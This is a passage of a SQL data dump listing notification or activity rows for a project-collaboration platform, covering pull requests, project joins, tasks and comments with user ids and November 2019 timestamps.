09:01:07','Apply',NULL),(548,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:07','2019-11-11 09:01:07','Apply',NULL),(549,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:08','2019-11-11 09:01:08','Apply',NULL),(550,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:09','2019-11-11 09:01:09','Apply',NULL),(551,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:10','2019-11-11 09:01:10','Apply',NULL),(552,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:10','2019-11-11 09:01:10','Apply',NULL),(553,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:12','2019-11-11 09:01:12','Apply',NULL),(554,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:13','2019-11-11 09:01:13','Apply',NULL),(555,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:01:16','2019-11-11 09:01:16','Apply',NULL),(556,1,1,203,'Project',NULL,NULL,NULL,NULL,0,0,'2019-11-11 09:01:30','2019-11-11 09:01:30','Project','1'),(558,49,46,203,'JoinProject',NULL,NULL,203,'Project',1,NULL,'2019-11-11 09:02:34','2019-11-11 09:02:34','Apply','4'),(559,46,49,203,'DealProject',NULL,NULL,203,'Project',1,NULL,'2019-11-11 09:02:38','2019-11-11 09:02:38','System','4'),(560,48,49,203,'ManagerJoinProject',NULL,NULL,203,'Project',NULL,NULL,'2019-11-11 09:11:06','2019-11-11 09:11:06','System','3'),(561,49,66,203,'JoinProject',NULL,NULL,203,'Project',1,NULL,'2019-11-11 09:12:52','2019-11-11 09:12:52','Apply','4'),(562,48,66,203,'JoinProject',NULL,NULL,203,'Project',1,NULL,'2019-11-11 09:12:52','2019-11-11 09:12:52','Apply','4'),(563,66,49,203,'DealProject',NULL,NULL,203,'Project',1,NULL,'2019-11-11 09:12:57','2019-11-11 09:12:57','System','4'),(564,1,1,204,'Project',NULL,NULL,NULL,NULL,0,0,'2019-11-11 09:19:45','2019-11-11 09:19:45','Project','1'),(566,49,46,19,'PullRequest',203,'Project',203,'Project',0,0,'2019-11-11 09:21:10','2019-11-11 09:21:10','Apply',NULL),(567,48,46,19,'PullRequest',203,'Project',203,'Project',0,0,'2019-11-11 09:21:10','2019-11-11 09:21:10','Apply',NULL),(568,1,1,205,'Project',NULL,NULL,NULL,NULL,0,0,'2019-11-11 09:21:19','2019-11-11 09:21:19','Project','1'),(570,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:32','2019-11-11 09:23:32','Apply',NULL),(571,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:37','2019-11-11 09:23:37','Apply',NULL),(572,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:38','2019-11-11 09:23:38','Apply',NULL),(573,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:44','2019-11-11 09:23:44','Apply',NULL),(574,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:45','2019-11-11 09:23:45','Apply',NULL),(575,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:46','2019-11-11 09:23:46','Apply',NULL),(576,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:23:54','2019-11-11 09:23:54','Apply',NULL),(577,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:24:39','2019-11-11 09:24:39','Apply',NULL),(578,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:24:41','2019-11-11 09:24:41','Apply',NULL),(579,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:25:36','2019-11-11 09:25:36','Apply',NULL),(580,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:25:38','2019-11-11 09:25:38','Apply',NULL),(581,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:31:17','2019-11-11 09:31:17','Apply',NULL),(582,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:31:31','2019-11-11 09:31:31','Apply',NULL),(583,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:35:44','2019-11-11 09:35:44','Apply',NULL),(584,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:37:56','2019-11-11 09:37:56','Apply',NULL),(585,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:39:51','2019-11-11 09:39:51','Apply',NULL),(586,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:39:53','2019-11-11 09:39:53','Apply',NULL),(587,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:40:21','2019-11-11 09:40:21','Apply',NULL),(588,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:40:23','2019-11-11 09:40:23','Apply',NULL),(589,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:40:24','2019-11-11 09:40:24','Apply',NULL),(590,49,46,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 09:40:25','2019-11-11 09:40:25','Apply',NULL),(593,49,46,206,'JoinProject',NULL,NULL,206,'Project',1,NULL,'2019-11-11 09:44:53','2019-11-11 09:44:53','Apply','4'),(594,46,49,206,'DealProject',NULL,NULL,206,'Project',1,NULL,'2019-11-11 09:44:57','2019-11-11 09:44:57','System','4'),(597,49,46,207,'JoinProject',NULL,NULL,207,'Project',1,NULL,'2019-11-11 09:49:02','2019-11-11 09:49:02','Apply','4'),(598,46,49,207,'DealProject',NULL,NULL,207,'Project',1,NULL,'2019-11-11 09:49:06','2019-11-11 09:49:06','System','4'),(601,49,46,208,'JoinProject',NULL,NULL,208,'Project',1,NULL,'2019-11-11 09:51:11','2019-11-11 09:51:11','Apply','4'),(602,46,49,208,'DealProject',NULL,NULL,208,'Project',1,NULL,'2019-11-11 09:51:22','2019-11-11 09:51:22','System','4'),(603,49,46,20,'PullRequest',208,'Project',208,'Project',1,0,'2019-11-11 09:56:52','2019-11-11 09:56:52','Apply',NULL),(604,46,49,20,'PullRequest',208,'Project',208,'Project',2,0,'2019-11-11 09:57:31','2019-11-11 09:57:31','Project',NULL),(605,46,49,124,'Journal',97,'Issue',208,'Project',NULL,0,'2019-11-11 10:00:12','2019-11-11 10:00:12','Comment',NULL),(606,49,1,66,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-11 10:02:42','2019-11-11 10:02:42','Task','6'),(612,49,46,212,'JoinProject',NULL,NULL,212,'Project',1,NULL,'2019-11-11 10:11:15','2019-11-11 10:11:15','Apply','4'),(613,49,59,212,'ReporterJoinProject',NULL,NULL,212,'Project',NULL,NULL,'2019-11-11 10:11:19','2019-11-11 10:11:19','System',NULL),(614,46,49,212,'DealProject',NULL,NULL,212,'Project',1,NULL,'2019-11-11 10:11:34','2019-11-11 10:11:34','System','4'),(615,49,46,21,'PullRequest',212,'Project',212,'Project',1,0,'2019-11-11 10:14:42','2019-11-11 10:14:42','Apply',NULL),(616,46,49,21,'PullRequest',212,'Project',212,'Project',2,0,'2019-11-11 10:14:50','2019-11-11 10:14:50','Project',NULL),(619,46,49,17,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 10:32:05','2019-11-11 10:32:05','Project',NULL),(620,49,66,22,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 10:43:01','2019-11-11 10:43:01','Apply',NULL),(621,66,49,22,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 10:44:05','2019-11-11 10:44:05','Project',NULL),(622,1,1,219,'Project',NULL,NULL,NULL,NULL,0,0,'2019-11-11 10:47:56','2019-11-11 10:47:56','Project','1'),(624,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 10:52:39','2019-11-11 10:52:39','Apply',NULL),(625,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 10:55:11','2019-11-11 10:55:11','Apply',NULL),(626,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 10:55:14','2019-11-11 10:55:14','Apply',NULL),(627,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 10:55:20','2019-11-11 10:55:20','Apply',NULL),(628,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 10:56:23','2019-11-11 10:56:23','Apply',NULL),(631,49,64,222,'JoinProject',NULL,NULL,222,'Project',1,NULL,'2019-11-11 11:00:41','2019-11-11 11:00:41','Apply','4'),(632,64,49,222,'DealProject',NULL,NULL,222,'Project',1,NULL,'2019-11-11 11:00:48','2019-11-11 11:00:48','System','4'),(633,49,66,222,'JoinProject',NULL,NULL,222,'Project',1,NULL,'2019-11-11 11:02:19','2019-11-11 11:02:19','Apply','4'),(634,66,49,222,'DealProject',NULL,NULL,222,'Project',1,NULL,'2019-11-11 11:02:28','2019-11-11 11:02:28','System','4'),(635,49,64,23,'PullRequest',222,'Project',222,'Project',0,0,'2019-11-11 11:06:51','2019-11-11 11:06:51','Apply',NULL),(636,48,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-11 11:08:00','2019-11-11 11:08:00','System','3'),(637,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:30','2019-11-11 11:14:30','Apply',NULL),(638,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:30','2019-11-11 11:14:30','Apply',NULL),(639,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:36','2019-11-11 11:14:36','Apply',NULL),(640,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:36','2019-11-11 11:14:36','Apply',NULL),(641,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:37','2019-11-11 11:14:37','Apply',NULL),(642,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:37','2019-11-11 11:14:37','Apply',NULL),(643,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:38','2019-11-11 11:14:38','Apply',NULL),(644,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:38','2019-11-11 11:14:38','Apply',NULL),(645,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:41','2019-11-11 11:14:41','Apply',NULL),(646,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:41','2019-11-11 11:14:41','Apply',NULL),(647,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:48','2019-11-11 11:14:48','Apply',NULL),(648,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:48','2019-11-11 11:14:48','Apply',NULL),(649,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:49','2019-11-11 11:14:49','Apply',NULL),(650,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:14:49','2019-11-11 11:14:49','Apply',NULL),(651,49,48,24,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:14:59','2019-11-11 11:14:59','Apply',NULL),(652,48,48,24,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:14:59','2019-11-11 11:14:59','Apply',NULL),(653,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:07','2019-11-11 11:15:07','Apply',NULL),(654,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:07','2019-11-11 11:15:07','Apply',NULL),(655,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:08','2019-11-11 11:15:08','Apply',NULL),(656,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:08','2019-11-11 11:15:08','Apply',NULL),(657,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:09','2019-11-11 11:15:09','Apply',NULL),(658,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:09','2019-11-11 11:15:09','Apply',NULL),(659,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:20','2019-11-11 11:15:20','Apply',NULL),(660,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:20','2019-11-11 11:15:20','Apply',NULL),(661,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:22','2019-11-11 11:15:22','Apply',NULL),(662,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:22','2019-11-11 11:15:22','Apply',NULL),(663,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:23','2019-11-11 11:15:23','Apply',NULL),(664,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:15:23','2019-11-11 11:15:23','Apply',NULL),(665,49,66,25,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:19:43','2019-11-11 11:19:43','Apply',NULL),(666,48,66,25,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:19:43','2019-11-11 11:19:43','Apply',NULL),(667,49,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:23:21','2019-11-11 11:23:21','Apply',NULL),(668,48,64,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:23:21','2019-11-11 11:23:21','Apply',NULL),(669,49,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:28:44','2019-11-11 11:28:44','Apply',NULL),(670,48,49,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:28:44','2019-11-11 11:28:44','Apply',NULL),(671,66,49,25,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 11:30:20','2019-11-11 11:30:20','Project',NULL),(672,49,49,26,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:31:43','2019-11-11 11:31:43','Apply',NULL),(673,48,49,26,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:31:43','2019-11-11 11:31:43','Apply',NULL),(674,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:32:35','2019-11-11 11:32:35','Apply',NULL),(675,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:32:35','2019-11-11 11:32:35','Apply',NULL),(676,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:32:43','2019-11-11 11:32:43','Apply',NULL),(677,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:32:43','2019-11-11 11:32:43','Apply',NULL),(678,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:33:02','2019-11-11 11:33:02','Apply',NULL),(679,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:33:02','2019-11-11 11:33:02','Apply',NULL),(680,49,64,27,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:33:37','2019-11-11 11:33:37','Apply',NULL),(681,48,64,27,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 11:33:37','2019-11-11 11:33:37','Apply',NULL),(682,64,49,27,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 11:34:38','2019-11-11 11:34:38','Project',NULL),(683,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:43:01','2019-11-11 11:43:01','Apply',NULL),(684,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:43:01','2019-11-11 11:43:01','Apply',NULL),(685,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:43:29','2019-11-11 11:43:29','Apply',NULL),(686,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:43:29','2019-11-11 11:43:29','Apply',NULL),(687,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:44:07','2019-11-11 11:44:07','Apply',NULL),(688,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:44:07','2019-11-11 11:44:07','Apply',NULL),(689,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:46:57','2019-11-11 11:46:57','Apply',NULL),(690,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:46:57','2019-11-11 11:46:57','Apply',NULL),(691,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:52:17','2019-11-11 11:52:17','Apply',NULL),(692,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:52:17','2019-11-11 11:52:17','Apply',NULL),(693,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:56:27','2019-11-11 11:56:27','Apply',NULL),(694,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 11:56:27','2019-11-11 11:56:27','Apply',NULL),(695,64,49,125,'Journal',101,'Issue',199,'Project',NULL,0,'2019-11-11 12:34:34','2019-11-11 12:34:34','Project',NULL),(696,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:35:46','2019-11-11 12:35:46','Apply',NULL),(697,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:35:46','2019-11-11 12:35:46','Apply',NULL),(698,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:36:23','2019-11-11 12:36:23','Apply',NULL),(699,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:36:23','2019-11-11 12:36:23','Apply',NULL),(700,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:37:17','2019-11-11 12:37:17','Apply',NULL),(701,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:37:17','2019-11-11 12:37:17','Apply',NULL),(702,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:22','2019-11-11 12:38:22','Apply',NULL),(703,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:22','2019-11-11 12:38:22','Apply',NULL),(704,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:26','2019-11-11 12:38:26','Apply',NULL),(705,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:26','2019-11-11 12:38:26','Apply',NULL),(706,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:38','2019-11-11 12:38:38','Apply',NULL),(707,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:38','2019-11-11 12:38:38','Apply',NULL),(708,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:47','2019-11-11 12:38:47','Apply',NULL),(709,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:38:47','2019-11-11 12:38:47','Apply',NULL),(710,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:39:16','2019-11-11 12:39:16','Apply',NULL),(711,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:39:16','2019-11-11 12:39:16','Apply',NULL),(712,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:40:07','2019-11-11 12:40:07','Apply',NULL),(713,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:40:07','2019-11-11 12:40:07','Apply',NULL),(714,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:43:57','2019-11-11 12:43:57','Apply',NULL),(715,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:43:57','2019-11-11 12:43:57','Apply',NULL),(716,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:44:43','2019-11-11 12:44:43','Apply',NULL),(717,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:44:43','2019-11-11 12:44:43','Apply',NULL),(718,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:46:08','2019-11-11 12:46:08','Apply',NULL),(719,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:46:08','2019-11-11 12:46:08','Apply',NULL),(720,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:46:39','2019-11-11 12:46:39','Apply',NULL),(721,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:46:39','2019-11-11 12:46:39','Apply',NULL),(722,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:48:20','2019-11-11 12:48:20','Apply',NULL),(723,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:48:20','2019-11-11 12:48:20','Apply',NULL),(724,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:50:35','2019-11-11 12:50:35','Apply',NULL),(725,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:50:35','2019-11-11 12:50:35','Apply',NULL),(726,49,64,28,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 12:51:04','2019-11-11 12:51:04','Apply',NULL),(727,48,64,28,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 12:51:04','2019-11-11 12:51:04','Apply',NULL),(728,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:51:07','2019-11-11 12:51:07','Apply',NULL),(729,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 12:51:07','2019-11-11 12:51:07','Apply',NULL),(730,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:01:15','2019-11-11 13:01:15','Apply',NULL),(731,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:01:15','2019-11-11 13:01:15','Apply',NULL),(732,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:02:50','2019-11-11 13:02:50','Apply',NULL),(733,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:02:50','2019-11-11 13:02:50','Apply',NULL),(734,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:07:29','2019-11-11 13:07:29','Apply',NULL),(735,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:07:29','2019-11-11 13:07:29','Apply',NULL),(736,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:13:31','2019-11-11 13:13:31','Apply',NULL),(737,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:13:31','2019-11-11 13:13:31','Apply',NULL),(738,49,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:28:33','2019-11-11 13:28:33','Apply',NULL),(739,48,48,NULL,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-11 13:28:33','2019-11-11 13:28:33','Apply',NULL),(740,66,49,22,'PullRequest',NULL,'Project',199,'Project',4,0,'2019-11-11 14:09:07','2019-11-11 14:09:07','Project',NULL),(741,49,49,29,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 14:09:39','2019-11-11 14:09:39','Apply',NULL),(742,48,49,29,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 14:09:39','2019-11-11 14:09:39','Apply',NULL),(743,49,49,29,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 14:09:42','2019-11-11 14:09:42','Project',NULL),(744,49,64,30,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 14:13:14','2019-11-11 14:13:14','Apply',NULL),(745,48,64,30,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-11 14:13:14','2019-11-11 14:13:14','Apply',NULL),(746,64,49,126,'Journal',100,'Issue',199,'Project',NULL,0,'2019-11-11 14:26:35','2019-11-11 14:26:35','Project',NULL),(747,66,49,127,'Journal',99,'Issue',199,'Project',NULL,0,'2019-11-11 14:26:45','2019-11-11 14:26:45','Project',NULL),(748,46,49,128,'Journal',98,'Issue',199,'Project',NULL,0,'2019-11-11 14:26:53','2019-11-11 14:26:53','Project',NULL),(751,49,64,227,'JoinProject',NULL,NULL,227,'Project',1,NULL,'2019-11-11 15:07:33','2019-11-11 15:07:33','Apply','4'),(752,64,49,227,'DealProject',NULL,NULL,227,'Project',1,NULL,'2019-11-11 15:07:46','2019-11-11 15:07:46','System','4'),(753,49,64,31,'PullRequest',227,'Project',227,'Project',1,0,'2019-11-11 15:11:41','2019-11-11 15:11:41','Apply',NULL),(754,64,49,31,'PullRequest',227,'Project',227,'Project',2,0,'2019-11-11 15:12:03','2019-11-11 15:12:03','Project',NULL),(755,64,49,30,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 15:33:39','2019-11-11 15:33:39','Project',NULL),(756,64,49,28,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 15:33:45','2019-11-11 15:33:45','Project',NULL),(757,48,49,24,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 15:34:02','2019-11-11 15:34:02','Project',NULL),(758,49,49,26,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-11 15:34:08','2019-11-11 15:34:08','Project',NULL),(759,64,49,28,'PullRequest',NULL,'Project',199,'Project',4,0,'2019-11-11 15:34:13','2019-11-11 15:34:13','Project',NULL),(760,1,1,232,'Project',NULL,NULL,NULL,NULL,0,0,'2019-11-11 17:07:52','2019-11-11 17:07:52','Project','1'),(761,49,1,82,'Review',NULL,NULL,NULL,NULL,1,0,'2019-11-11 17:08:08','2019-11-11 17:08:08','System','2'),(762,49,64,232,'JoinProject',NULL,NULL,232,'Project',1,NULL,'2019-11-11 17:08:49','2019-11-11 17:08:49','Apply','4'),(763,64,49,232,'DealProject',NULL,NULL,232,'Project',1,NULL,'2019-11-11 17:08:54','2019-11-11 17:08:54','System','4'),(764,50,66,104,'PraiseTread',240,'Memo',NULL,NULL,NULL,0,'2019-11-11 17:11:31','2019-11-11 17:11:31','Praise',NULL),(765,64,49,129,'Journal',102,'Issue',232,'Project',NULL,0,'2019-11-11 17:13:34','2019-11-11 17:13:34','Comment',NULL),(766,49,64,32,'PullRequest',232,'Project',232,'Project',1,0,'2019-11-11 17:15:46','2019-11-11 17:15:46','Apply',NULL),(767,64,49,32,'PullRequest',232,'Project',232,'Project',2,0,'2019-11-11 17:15:52','2019-11-11 17:15:52','Project',NULL),(768,49,1,67,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-11 17:20:42','2019-11-11 17:20:42','Task','6'),(769,1,49,64,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-11 17:24:49','2019-11-11 17:24:49','Project','2'),(770,49,1,61,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-11 17:25:43','2019-11-11 17:25:43','System','11'),(771,64,1,61,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-11 17:25:43','2019-11-11 17:25:43','System','11'),(772,65,1,61,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-11 17:25:43','2019-11-11 17:25:43','System','11'),(773,49,1,61,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-11 17:26:12','2019-11-11 17:26:12','System','10'),(774,64,1,99,'Paper',NULL,NULL,61,'Task',1,0,'2019-11-11 17:26:12','2019-11-11 17:26:12','System','12'),(775,65,1,102,'Paper',NULL,NULL,61,'Task',1,0,'2019-11-11 17:26:12','2019-11-11 17:26:12','System','12'),(777,49,59,234,'JoinProject',NULL,NULL,234,'Project',1,NULL,'2019-11-12 08:59:56','2019-11-12 08:59:56','Apply','3'),(778,59,49,234,'DealProject',NULL,NULL,234,'Project',1,NULL,'2019-11-12 09:00:03','2019-11-12 09:00:03','System','3'),(783,49,1,68,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-12 11:28:53','2019-11-12 11:28:53','Task','5'),(784,1,50,105,'PraiseTread',21,'Memo',NULL,NULL,NULL,0,'2019-11-12 14:55:37','2019-11-12 14:55:37','Praise',NULL),(785,1,49,68,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-13 08:23:50','2019-11-13 08:23:50','Project','2'),(786,49,1,68,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-13 08:29:58','2019-11-13 08:29:58','System','11'),(787,59,1,68,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-13 08:29:58','2019-11-13 08:29:58','System','11'),(788,49,1,68,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-13 08:30:17','2019-11-13 08:30:17','System','10'),(789,59,1,111,'Paper',NULL,NULL,68,'Task',1,0,'2019-11-13 08:30:17','2019-11-13 08:30:17','System','12'),(790,49,1,69,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-13 08:44:26','2019-11-13 08:44:26','Task','5'),(791,1,46,112,'Paper',NULL,NULL,69,'Task',1,0,'2019-11-13 08:46:56','2019-11-13 08:46:56','Comment','1'),(792,1,65,113,'Paper',NULL,NULL,69,'Task',1,0,'2019-11-13 08:51:15','2019-11-13 